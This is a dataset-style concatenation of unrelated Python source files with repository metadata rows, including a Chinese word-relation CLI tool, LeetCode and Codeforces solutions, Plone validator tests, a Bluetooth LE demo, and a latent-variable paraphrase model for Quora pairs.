w1 = prompt(u'%s --> (%d):' % (w0, i))
if len(w1) == 0:
break
save(w0, w1)
w0 = w1
def readLevel():
while True:
levelString = prompt(u'最大递归级数(3):')
if len(levelString) == 0:
levelString = 3
try:
level = int(levelString)
return level
except Exception:
print u'输入有误, 必须是整数!'
def lookup():
""" """
w0 = prompt(u'关键字:')
level = readLevel()
qs = db.query('select w0, w1, count(*) n from relation group by w0, w1')
df = DataFrame(list(qs))
tree = Tree()
tree.create_node(w0, w0)
appendList = []
def append(w0, level=5):
if w0 in appendList or level == 0:
return
appendList.append(w0)
for i, row in df[df['w0'] == w0].iterrows():
w1 = row['w1']
n = row['n']
# print w0, '-->', w1
if w1 not in tree:
title = '%s[%d]' % (w1, n)
tree.create_node(title, w1, parent=w0)
else:
# 出现循环
title = '%s[%d](*)' % (w1, n)
tree.create_node(title, i, parent=w0)
append(w1, level - 1)
append(w0, level)
tree.show()
def quit():
""" """
print u'再见!'
db.rollback()
exit()
def help():
""" """
print u'star: 星型添加'
print u'chain: 链式添加'
print u'commit: 保存'
print u'rollback: 取消'
print u'lookup: 查找'
print u'quit: 退出'
print u'help: 帮助'
commands = {
'star': star,
'chain': chain,
'lookup': lookup,
'commit': commit,
'rollback': rollback,
'quit': quit,
'help': help,
}
def main():
""" """
# 打印logo
f = Figlet(font='slant')
print f.renderText('Mandala')
# 读取并执行命令
try:
while True:
cmd = prompt(u'mandala>')
if cmd in commands:
commands[cmd]()
else:
print u'无效命令'
except KeyboardInterrupt:
quit()
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
35da38996a54cfbccf733b5859960068514b4714 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2332/60592/271480.py | f602a8c01f31dbba291aa53971306002fff48fef | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 630 | py | base = int(input())
tar = int(input())
res = 0
fun = []
te = 0
tem = tar
while tem != 0:
i = 0
if tem == 1:
te += 1
break
mark = 0
while mark <= tem:
mark = pow(base,i)
i+=1
te+=i-3
mark/=base
tem-=mark
if tem!= 0:
te+=1
fun.append(te)
te = 0
tem = tar
while tem != 0:
i = 0
if tem == 1 or tem == -1:
te+=1
break
mark = 0
while mark < abs(tem):
mark = pow(base,i)
i+=1
te+=i-2
if tem < 0:
tem+=mark
elif tem>0:
tem-=mark
if tem != 0:
te+=1
fun.append(te)
print(min(fun)) | [
"[email protected]"
] | |
516a6530d09f3f2717a8b0cf0e85c849bb9f4ad0 | f63907d2115becd64704ef1881f3bfcb7ba9047d | /sandbox/test/testTemplate.py | 91ba4b483092ee7a004dca1be860007bfd13cdaa | [] | no_license | AseiSugiyama/NZMATH-Python3 | d456610f72071a654531583228e439ffa8a4db0c | f65b176be2e58fafa0eea91f399c9ab17f3f478b | refs/heads/master | 2020-05-21T07:26:51.434191 | 2019-04-27T09:52:18 | 2019-04-27T09:52:18 | 185,959,644 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 989 | py | import unittest
import sandbox.hoge as hoge
class HogeTest (unittest.TestCase):
"""
Test classes must inherite unittest.TestCase.
They have name suffixed with 'Test'.
"""
def setUp(self):
"""
setUp is run before each test method run.
"""
pass
def tearDown(self):
"""
tearDown is run after each test method run.
"""
pass
def testHuga(self):
"""
Every test method have name prefixed with 'test'.
"""
# asserting something
self.assert_(hoge.ishoge(), "optional message string")
# asserting equality
self.assertEqual(1, hoge.huga)
# The following part is always unedited.
def suite(suffix="Test"):
suite = unittest.TestSuite()
all_names = globals()
for name in all_names:
if name.endswith(suffix):
suite.addTest(unittest.makeSuite(all_names[name], "test"))
return suite
if __name__ == '__main__':
runner = unittest.TextTestRunner()
runner.run(suite())
| [
"devnull@localhost"
] | devnull@localhost |
2b900473f8ebad3774236008a4ce12609bd077c4 | c4af67db4c523d20f2d55aef90ba77db1fb53c38 | /validation/tests/test_validation.py | c1128b9d609b6db323abf0d49d809d2207be7177 | [] | no_license | dtgit/dtedu | e59b16612d7d9ea064026bf80a44657082ef45a3 | d787885fe7ed0de6f9e40e9b05d852a0e9d60677 | refs/heads/master | 2020-04-06T05:22:50.025074 | 2009-04-08T20:13:20 | 2009-04-08T20:13:20 | 171,351 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,060 | py |
from Testing import ZopeTestCase
from Products.Archetypes.tests.atsitetestcase import ATSiteTestCase
from Testing.ZopeTestCase import doctest
from Products.validation import validation
class TestValidation(ATSiteTestCase):
def test_inNumericRange(self):
v = validation.validatorFor('inNumericRange')
self.failUnlessEqual(v(10, 1, 20), 1)
self.failUnlessEqual(v('10', 1, 20), 1)
self.failIfEqual(v(0, 4, 5), 1)
def test_isPrintable(self):
v = validation.validatorFor('isPrintable')
self.failUnlessEqual(v('text'), 1)
self.failIfEqual(v('\u203'), 1)
self.failIfEqual(v(10), 1)
def test_isSSN(self):
v = validation.validatorFor('isSSN')
self.failUnlessEqual(v('111223333'), 1)
self.failUnlessEqual(v('111-22-3333', ignore=r'-'), 1)
def test_isUSPhoneNumber(self):
v = validation.validatorFor('isUSPhoneNumber')
self.failUnlessEqual(v('(212) 555-1212',
ignore=r'[\s\(\)\-]'), 1)
self.failUnlessEqual(v('2125551212',
ignore=r'[\s\(\)\-]'), 1)
self.failUnlessEqual(v('(212) 555-1212'), 1)
def test_isURL(self):
v = validation.validatorFor('isURL')
self.failUnlessEqual(v('http://foo.bar:8080/manage'), 1)
self.failUnlessEqual(v('https://foo.bar:8080/manage'), 1)
self.failUnlessEqual(v('irc://[email protected]:6667/#plone'), 1)
self.failUnlessEqual(v('fish://tiran:password@myserver/~/'), 1)
self.failIfEqual(v('http://\n'), 1)
self.failIfEqual(v('../foo/bar'), 1)
def test_isEmail(self):
v = validation.validatorFor('isEmail')
self.failUnlessEqual(v('[email protected]'), 1)
self.failIfEqual(v('@foo.bar'), 1)
self.failIfEqual(v('me'), 1)
def test_isMailto(self):
v = validation.validatorFor('isMailto')
self.failUnlessEqual(v('mailto:[email protected]'), 1)
self.failIfEqual(v('[email protected]'), 1)
self.failIfEqual(v('mailto:@foo.bar'), 1)
self.failIfEqual(v('@foo.bar'), 1)
self.failIfEqual(v('mailto:'), 1)
self.failIfEqual(v('me'), 1)
def test_isUnixLikeName(self):
v = validation.validatorFor('isUnixLikeName')
self.failUnlessEqual(v('abcd'), 1)
self.failUnless(v('a_123456'), 1)
self.failIfEqual(v('123'), 1)
self.failIfEqual(v('ab.c'), 1)
self.failIfEqual(v('ab,c'), 1)
self.failIfEqual(v('aaaaaaaab'), 1) # too long
def test_isValidId(self):
v = validation.validatorFor("isValidId")
self.failIfEqual(v("a b", object()), 1)
# TODO: more tests require a site
def test_suite():
from unittest import TestSuite, makeSuite
suite = TestSuite()
suite.addTest(makeSuite(TestValidation))
doctests = (
'Products.validation.validators.ExpressionValidator',
)
for module in doctests:
suite.addTest(doctest.DocTestSuite(module))
return suite
| [
"[email protected]"
] | |
edd7334352747e1e9b08be0af986b1239e3ee6fe | 5a25edcf994a760688dc7c933e8071bf4ff24df3 | /exercises/ja/solution_01_08_01.py | 01762ddd77ee431a33af88413c4449ddfc5b02bc | [
"CC-BY-NC-4.0",
"MIT"
] | permissive | heyMP/spacy-course | 8762990ed6179011680730d9c24d5d34c0a8d954 | 3740c717f0d1090b01c1b0fe23f8e30af3bf0101 | refs/heads/master | 2022-11-07T21:52:15.479840 | 2020-06-25T18:13:44 | 2020-06-25T18:13:44 | 275,202,487 | 1 | 0 | MIT | 2020-06-26T16:39:32 | 2020-06-26T16:39:31 | null | UTF-8 | Python | false | false | 476 | py | import spacy
nlp = spacy.load("en_core_web_sm")
text = "It’s official: Apple is the first U.S. public company to reach a $1 trillion market value"
# テキストを処理
doc = nlp(text)
for token in doc:
# トークンの文字列、品詞タグ、依存関係ラベルを取得
token_text = token.text
token_pos = token.pos_
token_dep = token.dep_
# フォーマットしてプリント
print(f"{token_text:<12}{token_pos:<10}{token_dep:<10}")
| [
"[email protected]"
] | |
2f7b555b8a023acfc59b3616b78949d6bc53ab5f | 3349a0d44da04fd9fae7728ce1315ccf0c82285e | /556A - case of zeroes and ones.py | c96ebf9ebc0e1aad3e01b362c37be5bd17da4cdb | [] | no_license | umairnsr87/Data_Structures_Python | 959848e546fd4f98959bc14470c26ce91bfb5c9c | 05b5803521ed2ec7f64d95f08e2f014471dfdfd4 | refs/heads/master | 2023-07-18T12:11:55.245699 | 2023-07-16T17:01:09 | 2023-07-16T17:01:09 | 294,360,086 | 0 | 0 | null | 2023-07-16T17:01:10 | 2020-09-10T09:11:11 | Python | UTF-8 | Python | false | false | 567 | py | from collections import Counter
test = int(input())
strings = input()
# time complexity:O(n)
# while '01' or '10' in strings:
# if '01' in strings:
# strings = strings.replace('01', '')
# elif '10' in strings:
# strings = strings.replace('10', '')
# else:
# break
#
# print(len(strings))
# time complexity:O(1)
x = Counter(strings)
if (x['0'] == x['1']) and (x['0'] + x['1']) == len(strings):
print(0)
elif not x['1'] or not x['0']:
print(len(strings))
else:
a = min(x['0'], x['1'])
print(len(strings) - 2 * a)
| [
"[email protected]"
] | |
d8068915b32c07cb896a8397d6b917f876d3b5fe | 4549c02dac55f2b8ed113ddacf95264630d91698 | /Predict/__init__.py | 022ca012e6428d9d89aadfa04b3b27bb059bca6b | [] | no_license | kiminh/GPA | 43077bb59797a096e3660b226642c5fe091a9663 | 29c5ffd8d7aa1bc3ebe6d83d1e55a997a04e4b60 | refs/heads/master | 2021-02-10T20:45:35.581410 | 2020-01-14T08:59:00 | 2020-01-14T08:59:00 | 244,417,955 | 1 | 0 | null | 2020-03-02T16:23:00 | 2020-03-02T16:23:00 | null | UTF-8 | Python | false | false | 98 | py | # -*- coding: utf-8 -*-
# @Time : 2019/11/19 10:58
# @Author : zxl
# @FileName: __init__.py.py | [
"[email protected]"
] | |
e607164ee72ed5d0071b455388700dbe366a225e | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_windlasses.py | 6ee113296ad40900fcef0fed2db7fb643eaa9caf | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 232 | py |
#calss header
class _WINDLASSES():
def __init__(self,):
self.name = "WINDLASSES"
self.definitions = windlass
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['windlass']
| [
"[email protected]"
] | |
8c8e0126b4969636ebe2d414567e598beb70bf2c | e9a9955da9bee9be6580f1b1a75f97a1f99d0289 | /login/migrations/0016_auto_20190803_1452.py | eb4f2ea18f1fff82b8ba290db60a29457a52f715 | [] | no_license | Manjunatha1997/project_IT | bdb36142256b9d4eb1b75a76994d801dd3c33013 | fe58a30d033d4f4ed818c0282a802fafcf3aaff5 | refs/heads/master | 2021-02-28T04:17:13.872903 | 2020-03-07T15:48:49 | 2020-03-07T15:48:49 | 245,661,299 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 637 | py | # Generated by Django 2.1.7 on 2019-08-03 14:52
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('login', '0015_auto_20190803_0435'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='dob',
field=models.DateField(default=datetime.datetime(2019, 8, 3, 14, 52, 29, 693918)),
),
migrations.AlterField(
model_name='profile',
name='doj',
field=models.DateField(default=datetime.datetime(2019, 8, 3, 14, 52, 29, 693948)),
),
]
| [
"[email protected]"
] | |
f17669184ef2e9e58cc9613ffd6e8add89126ea3 | 09e8c92187ff8d7a726727041e2dd80850dcce3d | /leetcode/028_implement_strStr_TRICKY.py | 7154dcc9281455ccd29a545cb11042da6c8c43ad | [] | no_license | kakru/puzzles | 6dd72bd0585f526e75d026f3ba2446b0c14f60e0 | b91bdf0e68605f7e517446f8a00b1e0f1897c24d | refs/heads/master | 2020-04-09T09:47:31.341475 | 2019-05-03T21:24:41 | 2019-05-03T21:24:41 | 160,246,660 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,846 | py | #/usr/bin/env python3
import unittest
class Solution:
def strStr(self, haystack, needle):
"""
:type haystack: str
:type needle: str
:rtype: int
"""
h_len = len(haystack)
n_len = len(needle)
i = 0
while i <= h_len - n_len:
if haystack[i:i+n_len] == needle:
return i
i += 1
return -1
#
# There is a problem with a step by step solution it's easy to forget about:
# haystack="mississippi", needle="issippi"
# mississippi
# issippi --> X
# mississippi
# issippi --> OK
# the loop index on the haystack cannot go back to 0 !!
class BasicTest(unittest.TestCase):
def test_1(self):
input_ = "hello", "ll"
expected_output = 2
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_2(self):
input_ = "helo", "ll"
expected_output = -1
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_3(self):
input_ = "abc", ""
expected_output = 0
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_4(self):
input_ = "abc"*100000, "cab"
expected_output = 2
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_5(self):
input_ = "a", "a"
expected_output = 0
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_6(self):
input_ = "mississippi", "issippi"
expected_output = 4
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
if __name__ == '__main__':
unittest.main(verbosity=2) | [
"[email protected]"
] | |
ea641622136b336a1f7196b18e51f101df6df097 | d45bb44b0dfabfeff37c21a6ac0be1362782e39a | /utils/import_bookmarks.py | ea763b006243bdea76577f71ce07e8fba1168997 | [] | no_license | SyJarvis/BookmarkManager | c25f9df8cb0d0719de805f8080a7ae78c5ac529c | dc3baf06fd47c4514b148134ee3d3fa03f7f1571 | refs/heads/master | 2023-03-26T17:14:17.776441 | 2021-03-21T14:58:58 | 2021-03-21T14:58:58 | 322,634,112 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 647 | py | from pyquery import PyQuery as pq
class BookmarksTodb():
def __init__(self, filename='utils/bookmarks_2020_5_5_win.html'):
with open(filename, 'r+', encoding='utf-8') as file:
self.html = file.read()
self.doc = pq(self.html)
def get_cage_list(self):
cage_li = []
items = self.doc('H3')
for cage in items:
cage_li.append(cage.text)
return cage_li
def get_url_list(self):
lis = self.doc('A').items()
datas = []
for li in lis:
url_params = {}
url_params['url'] = li.attr('href')
url_params['title'] = li.text()
print(url_params)
datas.append(url_params)
return datas
| [
"[email protected]"
] | |
44f7d5e6d9055b7acb7c3147d5e6aa735fc3ce3e | a09e70355b756bd5cba55246e17eb0480af6257b | /examples/ble_demo_central.py | eb56a9cb9b54270e50eb0709aed3104e43dfecc4 | [
"MIT"
] | permissive | devoh747/Adafruit_CircuitPython_BLE | 9735381dc3481661af54ac32d89ec40e006edc5b | 7566483e2dbdb1bf6c71d5629a2ed37b113c7cff | refs/heads/master | 2020-08-09T04:14:59.774817 | 2019-10-10T21:11:07 | 2019-10-10T21:11:07 | 213,995,226 | 0 | 0 | MIT | 2019-10-09T18:33:32 | 2019-10-09T18:33:32 | null | UTF-8 | Python | false | false | 1,319 | py | """
Demonstration of a Bluefruit BLE Central. Connects to the first BLE UART peripheral it finds.
Sends Bluefruit ColorPackets, read from three potentiometers, to the peripheral.
"""
import time
import board
from analogio import AnalogIn
#from adafruit_bluefruit_connect.packet import Packet
# Only the packet classes that are imported will be known to Packet.
from adafruit_bluefruit_connect.color_packet import ColorPacket
from adafruit_ble.scanner import Scanner
from adafruit_ble.uart_client import UARTClient
def scale(value):
"""Scale an value from 0-65535 (AnalogIn range) to 0-255 (RGB range)"""
return int(value / 65535 * 255)
scanner = Scanner()
uart_client = UARTClient()
a3 = AnalogIn(board.A3)
a4 = AnalogIn(board.A4)
a5 = AnalogIn(board.A5)
while True:
uart_addresses = []
# Keep trying to find a UART peripheral
while not uart_addresses:
uart_addresses = uart_client.scan(scanner)
uart_client.connect(uart_addresses[0], 5)
while uart_client.connected:
r = scale(a3.value)
g = scale(a4.value)
b = scale(a5.value)
color = (r, g, b)
print(color)
color_packet = ColorPacket(color)
try:
uart_client.write(color_packet.to_bytes())
except OSError:
pass
time.sleep(0.3)
| [
"[email protected]"
] | |
3652ed9c9aa0576a74edaf5107cd392b4e4156b3 | 85c873074683ce54ab6056c42ca745f672867d72 | /quora/lstm_lvm/model.py | 415184aa3fd978ae5dcc8e9172689184ed6ff217 | [] | no_license | jihunchoi/cross-sentence-lvm-public | 46dbbec5c5cba3db38d42437f7f30dd4e4659fab | c48f890dc994fb538b47bea864c5bc3d182b622e | refs/heads/master | 2022-11-25T08:19:14.639728 | 2020-07-28T05:25:51 | 2020-07-28T05:25:51 | 283,109,097 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,256 | py | from typing import Any, Dict, Optional, Union, List
import torch
from torch import nn
from torch.distributions import Categorical
from torch.nn import functional
from allennlp.common.params import Params
from allennlp.data.vocabulary import Vocabulary
from allennlp.models.model import Model
from allennlp.modules.feedforward import FeedForward
from allennlp.modules.token_embedders import Embedding
from allennlp.modules.seq2seq_encoders import PytorchSeq2SeqWrapper
from allennlp.modules.seq2vec_encoders import PytorchSeq2VecWrapper
from allennlp.nn.activations import Activation
from allennlp.nn.util import (
get_text_field_mask, sequence_cross_entropy_with_logits
)
from allennlp.training.metrics import CategoricalAccuracy
from modules.code_generators import GaussianCodeGenerator, VmfCodeGenerator
from utils.metrics import ScalarMetric
class SeparatedQuoraModel(Model):
_NUM_LABELS = 2
def __init__(self,
params: Params,
vocab: Vocabulary) -> None:
super().__init__(vocab=vocab)
enc_hidden_dim = params.pop_int('enc_hidden_dim', 300)
gen_hidden_dim = params.pop_int('gen_hidden_dim', 300)
disc_hidden_dim = params.pop_int('disc_hidden_dim', 1200)
disc_num_layers = params.pop_int('disc_num_layers', 1)
code_dist_type = params.pop_choice(
'code_dist_type', ['gaussian', 'vmf'],
default_to_first_choice=True)
code_dim = params.pop_int('code_dim', 300)
tie_embedding = params.pop_bool('tie_embedding', False)
emb_dropout = params.pop_float('emb_dropout', 0.0)
disc_dropout = params.pop_float('disc_dropout', 0.0)
l2_weight = params.pop_float('l2_weight', 0.0)
self.emb_dropout = nn.Dropout(emb_dropout)
self.disc_dropout = nn.Dropout(disc_dropout)
self._l2_weight = l2_weight
self._token_embedder = Embedding.from_params(
vocab=vocab, params=params.pop('token_embedder'))
self._encoder = PytorchSeq2VecWrapper(
nn.LSTM(input_size=self._token_embedder.get_output_dim(),
hidden_size=enc_hidden_dim, batch_first=True))
self._generator = PytorchSeq2SeqWrapper(
nn.LSTM(input_size=(self._token_embedder.get_output_dim()
+ code_dim),
hidden_size=gen_hidden_dim, batch_first=True))
self._generator_projector = nn.Linear(
in_features=self._generator.get_output_dim(),
out_features=vocab.get_vocab_size())
if tie_embedding:
self._generator_projector.weight = self._token_embedder.weight
if code_dist_type == 'vmf':
vmf_kappa = params.pop_int('vmf_kappa', 150)
self._code_generator = VmfCodeGenerator(
input_dim=self._encoder.get_output_dim(),
code_dim=code_dim, kappa=vmf_kappa)
elif code_dist_type == 'gaussian':
self._code_generator = GaussianCodeGenerator(
input_dim=self._encoder.get_output_dim(),
code_dim=code_dim)
else:
raise ValueError('Unknown code_dist_type')
self._discriminator = FeedForward(
input_dim=2 * self._code_generator.get_output_dim(),
hidden_dims=[disc_hidden_dim]*disc_num_layers + [self._NUM_LABELS],
num_layers=disc_num_layers + 1,
activations=[Activation.by_name('relu')()] * disc_num_layers
+ [Activation.by_name('linear')()],
dropout=disc_dropout)
self._kl_weight = 1.0
self._discriminator_weight = params.pop_float(
'discriminator_weight', 0.1)
self._gumbel_temperature = 1.0
# Metrics
self._metrics = {
'generator_loss': ScalarMetric(),
'kl_divergence': ScalarMetric(),
'discriminator_accuracy': CategoricalAccuracy(),
'discriminator_loss': ScalarMetric(),
'loss': ScalarMetric()
}
def get_regularization_penalty(self):
sum_sq = sum(p.pow(2).sum() for p in self.parameters())
l2_norm = sum_sq.sqrt()
return self.l2_weight * l2_norm
@property
def l2_weight(self):
return self._l2_weight
@property
def kl_weight(self):
return self._kl_weight
@kl_weight.setter
def kl_weight(self, value):
self._kl_weight = value
@property
def discriminator_weight(self):
return self._discriminator_weight
@discriminator_weight.setter
def discriminator_weight(self, value):
self._discriminator_weight = value
def embed(self, tokens: torch.Tensor) -> torch.Tensor:
return self._token_embedder(tokens)
def encode(self,
inputs: torch.Tensor,
mask: torch.Tensor,
drop_start_token: bool = True) -> torch.Tensor:
if drop_start_token:
inputs = inputs[:, 1:]
mask = mask[:, 1:]
enc_hidden = self._encoder(inputs.contiguous(), mask)
return enc_hidden
def sample_code_and_compute_kld(self,
hidden: torch.Tensor) -> torch.Tensor:
return self._code_generator(hidden)
def discriminate(self,
premise_hidden: torch.Tensor,
hypothesis_hidden: torch.Tensor) -> torch.Tensor:
disc_input = torch.cat(
[premise_hidden + hypothesis_hidden,
(premise_hidden - hypothesis_hidden).abs()],
dim=-1)
disc_input = self.disc_dropout(disc_input)
disc_logits = self._discriminator(disc_input)
return disc_logits
def construct_generator_inputs(self,
embeddings: torch.Tensor,
code: torch.Tensor) -> torch.Tensor:
batch_size, max_length, _ = embeddings.shape
code_expand = code.unsqueeze(1).expand(
batch_size, max_length, -1)
inputs = torch.cat([embeddings, code_expand], dim=-1)
return inputs
def generate(self,
code: torch.Tensor,
max_length: torch.Tensor) -> torch.Tensor:
start_index = self.vocab.get_token_index('<s>')
end_index = self.vocab.get_token_index('</s>')
pad_index = 0
done = torch.zeros_like(max_length).long()
max_max_length = max_length.max().item()
prev_word = (torch.empty_like(done).long().unsqueeze(1)
.fill_(start_index))
generated = []
self._generator.stateful = True
self._generator.reset_states()
for t in range(max_max_length):
if done.byte().all():
break
prev_word_emb = self.embed(prev_word)
input_t = self.construct_generator_inputs(
embeddings=prev_word_emb, code=code)
hidden_t = self._generator(input_t, 1 - done.unsqueeze(1))
pred_t = self._generator_projector(hidden_t).argmax(2)
pred_t.masked_fill_(done.byte(), pad_index)
generated.append(pred_t)
done.masked_fill_(pred_t.eq(end_index).squeeze(1), 1)
done.masked_fill_(max_length.le(t + 1), 1)
prev_word = pred_t
self._generator.stateful = False
generated = torch.cat(generated, dim=1)
return generated
def convert_to_readable_text(self,
generated: torch.Tensor) -> List[List[str]]:
sequences = [seq.cpu().tolist() for seq in generated.unbind(0)]
readable_sequences = []
for seq in sequences:
readable_seq = []
for word_index in seq:
if word_index != 0:
word = self.vocab.get_token_from_index(word_index)
readable_seq.append(word)
readable_sequences.append(readable_seq)
return readable_sequences
def compute_generator_loss(self,
embeddings: torch.Tensor,
code: torch.Tensor,
targets: torch.Tensor,
mask: torch.Tensor) -> torch.Tensor:
inputs = self.construct_generator_inputs(
embeddings=embeddings, code=code)
hiddens = self._generator(inputs.contiguous(), mask)
logits = self._generator_projector(hiddens)
weights = mask.float()
loss = sequence_cross_entropy_with_logits(
logits=logits, targets=targets.contiguous(), weights=weights,
average=None)
return loss
def forward(self,
premise: Dict[str, torch.Tensor],
hypothesis: Dict[str, torch.Tensor],
label: Optional[torch.Tensor] = None) -> Dict[str, Any]:
"""
premise and hypothesis are padded with
the BOS and the EOS token.
"""
pre_mask = get_text_field_mask(premise)
hyp_mask = get_text_field_mask(hypothesis)
pre_tokens = premise['tokens']
hyp_tokens = hypothesis['tokens']
pre_token_embs = self.embed(pre_tokens)
hyp_token_embs = self.embed(hyp_tokens)
pre_token_embs = self.emb_dropout(pre_token_embs)
hyp_token_embs = self.emb_dropout(hyp_token_embs)
output_dict = {}
pre_hidden = self.encode(
inputs=pre_token_embs, mask=pre_mask, drop_start_token=True)
hyp_hidden = self.encode(
inputs=hyp_token_embs, mask=hyp_mask, drop_start_token=True)
pre_code, pre_kld = self.sample_code_and_compute_kld(pre_hidden)
hyp_code, hyp_kld = self.sample_code_and_compute_kld(hyp_hidden)
pre_kld = pre_kld.mean()
hyp_kld = hyp_kld.mean()
pre_gen_mask = pre_mask[:, 1:]
hyp_gen_mask = hyp_mask[:, 1:]
pre_gen_loss = self.compute_generator_loss(
embeddings=pre_token_embs[:, :-1], code=pre_code,
targets=pre_tokens[:, 1:], mask=pre_gen_mask)
hyp_gen_loss = self.compute_generator_loss(
embeddings=hyp_token_embs[:, :-1], code=hyp_code,
targets=hyp_tokens[:, 1:], mask=hyp_gen_mask)
pre_gen_loss = pre_gen_loss.mean()
hyp_gen_loss = hyp_gen_loss.mean()
gen_loss = pre_gen_loss + hyp_gen_loss
kld = pre_kld + hyp_kld
loss = gen_loss + self.kl_weight*kld
if label is not None:
disc_logits = self.discriminate(premise_hidden=pre_code,
hypothesis_hidden=hyp_code)
disc_loss = functional.cross_entropy(
input=disc_logits, target=label)
loss = loss + self.discriminator_weight*disc_loss
output_dict['discriminator_loss'] = disc_loss
self._metrics['discriminator_loss'](disc_loss)
self._metrics['discriminator_accuracy'](
predictions=disc_logits, gold_labels=label)
output_dict['generator_loss'] = gen_loss
output_dict['kl_divergence'] = kld
output_dict['loss'] = loss
self._metrics['generator_loss'](gen_loss)
self._metrics['kl_divergence'](kld)
self._metrics['loss'](loss)
return output_dict
def get_metrics(self, reset: bool = False
) -> Dict[str, Union[float, Dict[str, float]]]:
metrics = {k: v.get_metric(reset=reset)
for k, v in self._metrics.items()}
metrics['kl_weight'] = self.kl_weight
metrics['discriminator_weight'] = self.discriminator_weight
return metrics
def test_labeled():
from pprint import pprint
params = Params({
'token_embedder': {
'num_embeddings': 4,
'embedding_dim': 3
},
'code_dist_type': 'vmf',
'vmf_kappa': 100
})
vocab = Vocabulary()
while True:
vocab_size = vocab.get_vocab_size()
if vocab_size == 4:
break
vocab.add_token_to_namespace('a' + str(vocab_size))
model = SeparatedQuoraModel(params=params, vocab=vocab)
premise = {'tokens': torch.randint(low=0, high=4, size=(5, 6))}
hypothesis = {'tokens': torch.randint(low=0, high=4, size=(5, 7))}
label = torch.randint(low=0, high=3, size=(5,))
output = model(premise=premise, hypothesis=hypothesis, label=label)
pprint(output)
pprint(model.get_metrics())
def test_unlabeled():
from pprint import pprint
params = Params({
'token_embedder': {
'num_embeddings': 4,
'embedding_dim': 3
},
'code_dist_type': 'gaussian'
})
vocab = Vocabulary()
while True:
vocab_size = vocab.get_vocab_size()
if vocab_size == 4:
break
vocab.add_token_to_namespace('a' + str(vocab_size))
model = SeparatedQuoraModel(params=params, vocab=vocab)
premise = {'tokens': torch.randint(low=0, high=4, size=(5, 6))}
hypothesis = {'tokens': torch.randint(low=0, high=4, size=(5, 7))}
output = model(premise=premise, hypothesis=hypothesis, label=None)
pprint(output)
pprint(model.get_metrics())
if __name__ == '__main__':
test_labeled()
test_unlabeled()
| [
"[email protected]"
] | |
26abf2b58ee4ed7a69f2c069c5026e46fd6d5427 | 419873dd3b7412f704b1a7907b64a60b44cedf39 | /python/树/103. 二叉树的锯齿形层次遍历.py | b3b9739640c5bbaeecf8e7c3f913e970275761a9 | [] | no_license | Weless/leetcode | 0585c5bfa260713f44dabc51fa58ebf8a10e7814 | 0566622daa5849f7deb0cfdc6de2282fb3127f4c | refs/heads/master | 2021-11-13T07:59:20.299920 | 2021-10-25T02:09:53 | 2021-10-25T02:09:53 | 203,720,668 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 818 | py | class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
from typing import List
class Solution:
def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]:
if not root:
return []
from collections import deque
queue = deque()
queue.append(root)
res = []
level = 1
while queue:
tmp = []
for _ in range(len(queue)):
node = queue.popleft()
tmp.append(node.val)
if node.left: queue.append(node.left)
if node.right: queue.append(node.right)
if level % 2 == 0:
res.append(tmp[::-1])
else:
res.append(tmp)
level += 1
return res
| [
"[email protected]"
] | |
0a912a7112a0beabf813cc00fba1cdb7c2e3daad | d35167f7ab29813d926bd702fa652090556befdf | /generated/test_facebookresearch_TimeSformer.py | 7cf65f94103dda891ae436570da86b4a73b849eb | [] | no_license | jansel/pytorch-jit-paritybench | 65e5311d43daf5065beac52a68488ce188199fa8 | 7e55a422588c1d1e00f35a3d3a3ff896cce59e18 | refs/heads/master | 2023-08-12T04:43:16.669114 | 2023-06-08T17:36:32 | 2023-06-08T17:36:32 | 270,464,378 | 35 | 15 | null | 2023-06-08T17:36:34 | 2020-06-07T23:42:50 | Python | UTF-8 | Python | false | false | 111,676 | py | import sys
_module = sys.modules[__name__]
del sys
setup = _module
timesformer = _module
config = _module
defaults = _module
datasets = _module
build = _module
cv2_transform = _module
decoder = _module
kinetics = _module
loader = _module
multigrid_helper = _module
ssv2 = _module
transform = _module
utils = _module
video_container = _module
models = _module
batchnorm_helper = _module
build = _module
conv2d_same = _module
custom_video_model_builder = _module
features = _module
head_helper = _module
helpers = _module
linear = _module
losses = _module
nonlocal_helper = _module
operators = _module
optimizer = _module
resnet_helper = _module
stem_helper = _module
video_model_builder = _module
vit = _module
vit_utils = _module
ava_eval_helper = _module
ava_evaluation = _module
label_map_util = _module
metrics = _module
np_box_list = _module
np_box_list_ops = _module
np_box_mask_list = _module
np_box_mask_list_ops = _module
np_box_ops = _module
np_mask_ops = _module
object_detection_evaluation = _module
per_image_evaluation = _module
standard_fields = _module
benchmark = _module
bn_helper = _module
c2_model_loading = _module
checkpoint = _module
distributed = _module
env = _module
logging = _module
lr_policy = _module
meters = _module
